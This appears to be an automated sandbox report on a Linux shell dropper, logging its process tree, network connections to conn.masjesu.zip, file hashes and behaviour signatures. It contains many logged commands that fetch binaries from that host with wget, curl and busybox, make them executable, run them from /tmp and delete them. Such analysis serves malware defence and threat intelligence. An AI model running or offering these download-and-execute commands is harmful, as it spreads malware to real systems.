[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.121.86.228:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| FR | 37.44.238.68:80 | conn.masjesu.zip | tcp |
Files
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-12-16 04:16
Reported
2024-12-16 04:52
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
599s
Max time network
481s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.8:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.49:80 | connectivity-check.ubuntu.com | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.49:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-12-16 04:16
Reported
2024-12-16 04:52
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
13s
Max time network
564s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
